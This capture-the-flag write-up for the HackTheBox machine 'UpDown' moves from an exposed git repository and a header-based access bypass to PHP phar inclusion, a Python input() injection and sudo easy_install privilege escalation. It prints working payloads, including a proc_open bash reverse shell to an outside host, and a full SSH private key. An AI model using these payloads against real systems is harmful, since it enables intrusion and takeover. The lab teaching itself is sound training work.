WriteupsHTB — UpDown
WebMediumLinux
HTB — UpDown
Site availability checker with .htaccess allowlist bypass. PHP phar deserialization for code execution, proc_open for shell, developer sudo suid binary.
November 19, 2024HackTheBox
#PHAR Deserialization#LFI#Bypass#Sudo
nmap
sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.129.227.227
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-19 14:14 EST
Stats: 0:00:28 elapsed; 0 hosts completed (1 up), 1 undergoing Traceroute
Traceroute Timing: About 32.26% done; ETC: 14:15 (0:00:00 remaining)
Nmap scan report for 10.129.227.227
Host is up (0.021s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 9e:1f:98:d7:c8:ba:61:db:f1:49:66:9d:70:17:02:e7 (RSA)
| 256 c2:1c:fe:11:52:e3:d7:e5:f7:59:18:6b:68:45:3f:62 (ECDSA)
|_ 256 5f:6e:12:67:0a:66:e8:e2:b7:61:be:c4:14:3a:d3:8e (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Is my Website up ?
|_http-server-header: Apache/2.4.41 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=11/19%OT=22%CT=1%CU=41185%PV=Y%DS=2%DC=T%G=Y%TM=673
OS:CE3B5%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10E%TI=Z%CI=Z%II=I%TS=A
OS:)SEQ(SP=103%GCD=1%ISR=10E%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M53CST11NW7%O2=M53C
OS:ST11NW7%O3=M53CNNT11NW7%O4=M53CST11NW7%O5=M53CST11NW7%O6=M53CST11)WIN(W1
OS:=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O
OS:=M53CNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N
OS:)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=
OS:S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF
OS:=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=
OS:G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 15.99 ms 10.10.14.1
2 18.77 ms 10.129.227.227
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.15 seconds
80/tcp open http Apache httpd 2.4.41
sh
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Is my Website up ?
|_http-server-header: Apache/2.4.41 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).feroxbuster
sh
feroxbuster --url http://10.129.227.227/
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.129.227.227/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403 GET 9l 28w 279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 9l 31w 276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 9l 28w 314c http://10.129.227.227/dev => http://10.129.227.227/dev/
200 GET 320l 675w 5531c http://10.129.227.227/stylesheet.css
200 GET 40l 93w 1131c http://10.129.227.227/
[####################] - 21s 60005/60005 0s found:3 errors:0
[####################] - 20s 30000/30000 1532/s http://10.129.227.227/
[####################] - 19s 30000/30000 1550/s http://10.129.227.227/dev/ subdomain fuzzing
sh
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt:FUZZ -u http://siteisup.htb/ -H 'Host: FUZZ.siteisup.htb' -fs 1131
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://siteisup.htb/
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
:: Header : Host: FUZZ.siteisup.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 1131
________________________________________________
dev [Status: 403, Size: 281, Words: 20, Lines: 10, Duration: 30ms]sh
feroxbuster --url http://siteisup.htb/dev/ -x php,txt,pdf,asp,aspx,py,js,jsp,yml,yaml,zip,rb,pl,doc,docx,xls,xlsx,conf,sql,git
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://siteisup.htb/dev/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [php, txt, pdf, asp, aspx, py, js, jsp, yml, yaml, zip, rb, pl, doc, docx, xls, xlsx, conf, sql, git]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403 GET 9l 28w 277c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 9l 31w 274c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 0l 0w 0c http://siteisup.htb/dev/
301 GET 9l 28w 315c http://siteisup.htb/dev/.git => http://siteisup.htb/dev/.git/git directory
sh
git-dumper http://siteisup.htb/dev/.git ./websitesh
git log
commit 010dcc30cc1e89344e2bdbd3064f61c772d89a34 (HEAD -> main, origin/main, origin/HEAD)
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 19:38:51 2021 +0200
Delete index.php
commit c8fcc4032487eaf637d41486eb150b7182ecd1f1
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 19:38:08 2021 +0200
Update checker.php
commit f67efd00c10784ae75bd251add3d52af50d7addd
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 18:33:11 2021 +0200
Create checker.php
commit ab9bc164b4103de3c12ac97152e6d63040d5c4c6
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 18:30:58 2021 +0200
Update changelog.txt
commit 60d2b3280d5356fe0698561e8ef8991825fec6cb
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 18:30:39 2021 +0200
Create admin.php
commit c1998f8fbe683dd0bee8d94167bb896bd926c4c7
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 18:29:45 2021 +0200
Add admin panel.
commit 35a380176ff228067def9c2ecc52ccfe705de640
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 17:40:49 2021 +0200
Update changelog.txt
commit 57af03ba60cdcfe443e92c33c188c6cecb70eb10
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 17:29:42 2021 +0200
Create index.php
commit 354fe069f6205af09f26c99cfe2457dea3eb6a6c
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 17:28:48 2021 +0200
Delete .htpasswd
commit 8812785e31c879261050e72e20f298ae8c43b565
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 16:38:54 2021 +0200
New technique in header to protect our dev vhost.
commit bc4ba79e596e9fd98f1b2837b9bd3548d04fe7ab
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 16:37:20 2021 +0200
Update .htaccess
New technique in header to protect our dev vhost.
commit 61e5cc0550d44c08b6c316d4f04d3fcc7783ae71
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 15:45:48 2021 +0200
Update index.php
commit 3d66cd48933b35f4012066bcc7ee8d60f0069926
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 15:45:18 2021 +0200
Create changelog.txt
commit 4fb192727c29c158a659911aadcdcc23e4decec5
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 15:28:26 2021 +0200
Create stylesheet.css
commit 6f89af70fd23819664dd28d764f13efc02ecfd88
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 15:05:40 2021 +0200
Create index.php
commit 8d1beb1cf5a1327c4cdb271b8efb1599b1b1c87f
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 15:05:08 2021 +0200
Create .htpasswd
commit 6ddcc7a8ac393edb7764788c0cbc13a7a521d372
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 15:04:38 2021 +0200
Create .htaccessgit show
sh
git show 6ddcc7a8ac393edb7764788c0cbc13a7a521d372
commit 6ddcc7a8ac393edb7764788c0cbc13a7a521d372
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 15:04:38 2021 +0200
Create .htaccess
diff --git a/.htaccess b/.htaccess
new file mode 100644
index 0000000..3190432
--- /dev/null
+++ b/.htaccess
@@ -0,0 +1,5 @@
+AuthType Basic
+AuthUserFile /var/www/dev/.htpasswd
+AuthName "Remote Access Denied"
+Require ip 127.0.0.1 ::1
+Require valid-usersh
git show 8d1beb1cf5a1327c4cdb271b8efb1599b1b1c87f
commit 8d1beb1cf5a1327c4cdb271b8efb1599b1b1c87f
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 15:05:08 2021 +0200
Create .htpasswd
diff --git a/.htpasswd b/.htpasswd
new file mode 100644
index 0000000..8b13789
--- /dev/null
+++ b/.htpasswd
@@ -0,0 +1 @@
+sh
git show 3d66cd48933b35f4012066bcc7ee8d60f0069926
commit 3d66cd48933b35f4012066bcc7ee8d60f0069926
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 15:45:18 2021 +0200
Create changelog.txt
diff --git a/changelog.txt b/changelog.txt
new file mode 100644
index 0000000..88d3109
--- /dev/null
+++ b/changelog.txt
@@ -0,0 +1,7 @@
+Beta version
+
+1- Check a bunch of websites.
+
+-- ToDo:
+
+1- Multithreading for a faster version :D.sh
git show 61e5cc0550d44c08b6c316d4f04d3fcc7783ae71
commit 61e5cc0550d44c08b6c316d4f04d3fcc7783ae71
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 15:45:48 2021 +0200
Update index.php
diff --git a/index.php b/index.php
index b9ba056..c41432c 100644
--- a/index.php
+++ b/index.php
@@ -1 +1,9 @@
<b>This is only for developers</b>
+<br>
+<?php
+ define("DIRECTACCESS",false);
+ $page=$_GET['page'];
+ if($page && !preg_match("/bin|usr|home|var|etc/i",$page)){
+ include($_GET['page'] . ".php");
+ }
+?>sh
git show c1998f8fbe683dd0bee8d94167bb896bd926c4c7
commit c1998f8fbe683dd0bee8d94167bb896bd926c4c7
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 18:29:45 2021 +0200
Add admin panel.
diff --git a/index.php b/index.php
index c41432c..32eeeee 100644
--- a/index.php
+++ b/index.php
@@ -1,9 +1,12 @@
<b>This is only for developers</b>
<br>
+<a href="?page=admin">Admin Panel</a>
<?php
define("DIRECTACCESS",false);
$page=$_GET['page'];
if($page && !preg_match("/bin|usr|home|var|etc/i",$page)){
include($_GET['page'] . ".php");
- }
+ }else{
+ include("checker.php");
+ }
?>
sh
git show 60d2b3280d5356fe0698561e8ef8991825fec6cb
commit 60d2b3280d5356fe0698561e8ef8991825fec6cb
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 18:30:39 2021 +0200
Create admin.php
diff --git a/admin.php b/admin.php
new file mode 100644
index 0000000..940a317
--- /dev/null
+++ b/admin.php
@@ -0,0 +1,7 @@
+<?php
+if(DIRECTACCESS){
+ die("Access Denied");
+}
+
+#ToDo
+?>
.htaccess
- need this special header to interact with
dev.siteisup.htb
sh
cat .htaccess
SetEnvIfNoCase Special-Dev "only4dev" Required-Header
Order Deny,Allow
Deny from All
Allow from env=Required-Header- in burp add this special header
checker.py
sh
git show f67efd00c10784ae75bd251add3d52af50d7addd
commit f67efd00c10784ae75bd251add3d52af50d7addd
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 18:33:11 2021 +0200
Create checker.php
diff --git a/checker.php b/checker.php
new file mode 100644
index 0000000..aa9aa44
--- /dev/null
+++ b/checker.php
@@ -0,0 +1,116 @@
+<?php
+if(DIRECTACCESS){
+ die("Access Denied");
+}
+?>
+<!DOCTYPE html>
+<html>
+
+ <head>
+ <meta charset='utf-8' />
+ <meta http-equiv="X-UA-Compatible" content="chrome=1" />
+ <link rel="stylesheet" type="text/css" media="screen" href="stylesheet.css">
+ <title>Is my Website up ? (beta version)</title>
+ </head>
+
+ <body>
+
+ <div id="header_wrap" class="outer">
+ <header class="inner">
+ <h1 id="project_title">Welcome,<br> Is My Website UP ?</h1>
+ <h2 id="project_tagline">In this version you are able to scan a list of websites !</h2>
+ </header>
+ </div>
+
+ <div id="main_content_wrap" class="outer">
+ <section id="main_content" class="inner">
+ <form method="post" enctype="multipart/form-data">
+ <label>List of websites to check:</label><br><br>
+ <input type="file" name="file" size="50">
+ <input name="check" type="submit" value="Check">
+ </form>
+
+<?php
+
+function isitup($url){
+ $ch=curl_init();
+ curl_setopt($ch, CURLOPT_URL, trim($url));
+ curl_setopt($ch, CURLOPT_USERAGENT, "siteisup.htb beta");
+ curl_setopt($ch, CURLOPT_HEADER, 1);
+ curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+ curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+ curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
+ curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
+ curl_setopt($ch, CURLOPT_TIMEOUT, 30);
+ $f = curl_exec($ch);
+ $header = curl_getinfo($ch);
+ if($f AND $header['http_code'] == 200){
+ return array(true,$f);
+ }else{
+ return false;
+ }
+ curl_close($ch);
+}
+
+if($_POST['check']){
+
+ # File size must be less than 10kb.
+ if ($_FILES['file']['size'] > 10000) {
+ die("File too large!");
+ }
+ $file = $_FILES['file']['name'];
+
+ # Check if extension is allowed.
+ $ext = getExtension($file);
+ if(preg_match("/php|php[0-9]|html|py|pl|phtml|zip|rar|gz|gzip|tar/i",$ext)){
+ die("Extension not allowed!");
+ }
+
+ # Create directory to upload our file.
+ $dir = "uploads/".md5(time())."/";
+ if(!is_dir($dir)){
+ mkdir($dir, 0770, true);
+ }
+
+ # Upload the file.
+ $final_path = $dir.$file;
+ move_uploaded_file($_FILES['file']['tmp_name'], "{$final_path}");
+
+ # Read the uploaded file.
+ $websites = explode("\n",file_get_contents($final_path));
+
+ foreach($websites as $site){
+ $site=trim($site);
+ if(!preg_match("#file://#i",$site) && !preg_match("#data://#i",$site) && !preg_match("#ftp://#i",$site)){
+ $check=isitup($site);
+ if($check){
+ echo "<center>{$site}<br><font color='green'>is up ^_^</font></center>";
+ }else{
+ echo "<center>{$site}<br><font color='red'>seems to be down :(</font></center>";
+ }
+ }else{
+ echo "<center><font color='red'>Hacking attempt was detected !</font></center>";
+ }
+ }
+
+ # Delete the uploaded file.
+ @unlink($final_path);
+}
+
+function getExtension($file) {
+ $extension = strrpos($file,".");
+ return ($extension===false) ? "" : substr($file,$extension+1);
+}
+?>
+ </section>
+ </div>
+
+ <div id="footer_wrap" class="outer">
+ <footer class="inner">
+ <p class="copyright">siteisup.htb (beta)</p><br>
+ <a class="changelog" href="changelog.txt">changelog.txt</a><br>
+ </footer>
+ </div>
+
+ </body>
+</html>php
echo '<?php phpinfo();?>' > info.phpsh
zip info.zip info.php
mv info.zip info.txt
-
A tool like dfunc-bypasser.py will read
phpinfo()output and show what vulnerabilities may still be present. -
https://github.com/teambi0s/dfunc-bypasser
-
add this to the code
python
if(args.url):
url = args.url
phpinfo = requests.get(url,headers={"Special-dev":"only4dev"}).textsh
python2 dfunc-bypasser.py --url "http://dev.siteisup.htb/?page=phar://uploads/c0f5a42d.../info.txt/info"
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
,---,
.' .' `\
,---.' \
| | .`\ |
: : | ' |
| ' ' ; :
' | ; . |
| | : | '
' : | / ;
| | '` ,/
; : .'
| ,.'
'---'
authors: __c3rb3ru5__, $_SpyD3r_$
Please add the following functions in your disable_functions option:
proc_open
If PHP-FPM is there stream_socket_sendto,stream_socket_client,fsockopen can also be used to be exploit by poisoning the request to the unix socketrev shell
rev.php
php
<?php
$descriptorspec = array(
0 => array('pipe', 'r'), // stdin
1 => array('pipe', 'w'), // stdout
2 => array('pipe', 'a') // stderr
);
$cmd = "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.2/80 0>&1'";
$process = proc_open($cmd, $descriptorspec, $pipes, null, null);
?>sh
zip rev.zip rev.php
mv rev.zip rev.txtsh
nc -lnvp 80
listening on [any] 80 ...
connect to [10.10.14.2] from (UNKNOWN) [10.129.227.227] 59846
bash: cannot set terminal process group (894): Inappropriate ioctl for device
bash: no job control in this shell
www-data@updown:/var/www/dev$ whoai
whoai
Command 'whoai' not found, did you mean:
command 'whoami' from deb coreutils (8.30-3ubuntu2)
Try: apt install <deb name>
www-data@updown:/var/www/dev$ whoami
whoami
www-dataThere are two files in the dev folder; a python script and a setuid executable. When an executable has the
setuid permission set it, will run as the respective owner of the file, in this case developer . The contents
of the Python script are as follows.
python
www-data@updown:/home/developer/dev$ cat siteisup_test.py
cat siteisup_test.py
import requests
url = input("Enter URL here:")
page = requests.get(url)
if page.status_code == 200:
print "Website is up"
else:
print "Website is down"- the above takes input so can use below
sh
__import__('os').system('/bin/bash')sh
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwsr-x--- 1 developer www-data 17K Jun 22 2022 /home/developer/dev/siteisup (Unknown SUID binary!)sh
www-data@updown:/home/developer/dev$ /home/developer/dev/siteisup
/home/developer/dev/siteisup
__import__('os').system('/bin/bash')
whoami
developersh
cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
sh
ssh -i id_rsa developer@10.129.227.227user.txt
sh
developer@updown:~$ cat user.txt
ce20af21...priv esc
sudo
sh
developer@updown:~$ sudo -l
Matching Defaults entries for developer on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User developer may run the following commands on localhost:
(ALL) NOPASSWD: /usr/local/bin/easy_installgtfobins easy_install
sh
developer@updown:~$ TF=$(mktemp -d)
developer@updown:~$ echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
developer@updown:~$ sudo /usr/local/bin/easy_install $TF
WARNING: The easy_install command is deprecated and will be removed in a future version.
Processing tmp.RzxGgWYZ3q
Writing /tmp/tmp.RzxGgWYZ3q/setup.cfg
Running setup.py -q bdist_egg --dist-dir /tmp/tmp.RzxGgWYZ3q/egg-dist-tmp-UWIqp_
# whoami
rootroot.txt
sh
# cat root.txt
6ab5f72b...Up next
MediumNov 2024
HTB — Escape
MSSQL Silver Ticket attack via SPN enumeration. Responder captures NTLMv2 hash from SQL query, certificate auth for Domain Admin.
Read writeup
EasyNov 2024
HTB — ServMon
Anonymous FTP reveals NVMS-1000 path traversal note. LFI reads credentials file, SSH pivoting to access NSClient++ for SYSTEM.
Read writeup
MediumNov 2024
HTB — Sniper
PHP RFI via language parameter loads SMB share for RCE. Lateral movement via credential in web config. CHM file drops reverse shell as Administrator.
Read writeup